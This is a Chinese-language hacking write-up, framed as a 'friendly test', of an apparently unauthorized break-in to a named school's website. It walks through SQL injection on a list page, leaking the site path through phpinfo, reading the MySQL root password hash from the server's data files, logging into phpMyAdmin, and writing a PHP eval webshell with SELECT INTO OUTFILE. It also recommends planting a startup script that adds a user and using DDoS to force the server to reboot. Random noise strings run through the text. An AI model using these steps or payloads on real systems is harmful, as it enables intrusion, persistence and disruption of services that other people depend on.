友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
- `! T7 y) C6 L3 Y; y发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
" V4 d5 [! g6 Y; t- f- M
那么想可以直接写入shell ，getshell有几个条件：
7 X% p0 i9 W' t% ]

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

. d" W, e6 j8 w0 E$ r$ }试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
! D! \/ \2 s6 d1 X0 z3./load_file()  
" v+ R4 ~& ?" t& l4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
4 `# }0 s% ^+ g5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7 t& I0 J& G7 f% U7./phpmyadmin/libraries/mcrypt.lib.php   
1 e. z* u% S. n" c8./phpmyadmin/libraries/export/xls.php  
1 L& t0 Q6 k3 q( E! U
均不行...........................
0 {$ r8 P8 D8 K2 ~" J: h, j: C( G
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
1 F) h4 ~3 \6 ?' ~$ r! I
# S- h! s' X0 o  z权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
4 \3 a2 T! n# _: C0 U
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
5 ^- T2 [+ F; w) V1 R% Z
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
/ H+ V! w. E5 A0 I8 y7 c
: G* F! R# r( C0 s3 q7 shttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
% m, c+ \2 E+ o$ ]/ |# ^
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

- k9 l3 K$ q! s9 X7 i17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
/ z" }4 A$ m$ p6 l' h21---- *(002a)
22---- 8(0038)
23---- 2(0032)
6 B- `) l- \( j0 z5 x5 j) ]5 ]7 j24---- E(0045)
25---- 1(0031)
6 G5 a4 l' ]( S1 Y- j9 @26---- C(0043)
* S6 u& `2 S3 i27---- 5(0035)
: K" g( u' @+ z# z9 c28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
# Q3 ?( V# U/ y. c, l8 x3 X1 l31---- A(0041)
5 h' A* u4 W8 g32---- 9(0039)
/ ]% I- M$ U$ Z. W( V( e/ A, S) U33---- B(0042)
& E, Z; T' c3 |2 t7 V( U; ]34---- 5(0035)
35---- 4(0034)
+ x7 P5 r3 K, G36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
7 p4 P) O# c% `- W) k8 \1 U39---- 9(0039)
3 M( Q9 A, c. ]4 C1 a40---- 1(0031)
" c  M3 {6 \5 R" @41---- 1(0031)
42---- 5(0035)
8 V- r7 ^& D1 m9 o+ \3 k5 T43---- 3(0033)
8 w  o2 y! ~$ G0 [9 b) j44---- 5(0035)
45---- 9(0039)
; T- L1 `* p5 a" A  i46---- 8(0038)
# G7 F7 j! H& J& t3 j) D! G47---- F(0046)
. z2 ^: U( t% h, `9 U; U48---- F(0046)
49---- 4(0034)
50---- F(0046)
51---- 0(0030)
/ k. k; Q1 ^0 g) }% h& B9 v52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
6 K2 I9 b& j9 K, Z  [2 n* F56---- A(0041)
/ W* o  J4 y# N/ R57---- B(0042)
58---- *(0044)
59---- *(0035)
. B% @- e9 b+ U4 h60---- *(0041)
61---- *0032)
3 G7 M, ]- {& [* e8 y
0 |! m- A) }) e+ |, _2 [解密后成功登陆phpmyamin
                          
) q* X. B, Z% t, J+ a2 ^( A
$ G+ i6 \& I+ v" j5 u2 G6 w                             
* o$ L7 g5 y( u) n
2 Q8 |9 [0 N. }$ ?$ i找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: K% y2 e/ L; o( x
# s% H! ~; p. G3 s7 m, {0 W5 ~成功执行，拿下shell，菜刀连接：

$ G' u4 Y# w6 x6 P* u服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
8 K+ ?4 p8 B. ?' `8 }; _; E

服务器上已经有个隐藏帐号了

7 J6 M6 Z' J: F1 F

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

$ |' [: o* |. u: g5 I

-------------------------------------------------------------------------------
admin
Administrator
* T* v4 L4 a/ m7 lslipper$
sqluser
命令成功完成。

& V: b) r: t! E5 V0 J- a9 l- l服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

+ z8 {6 m* V( w# C$ f1 T! Yddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel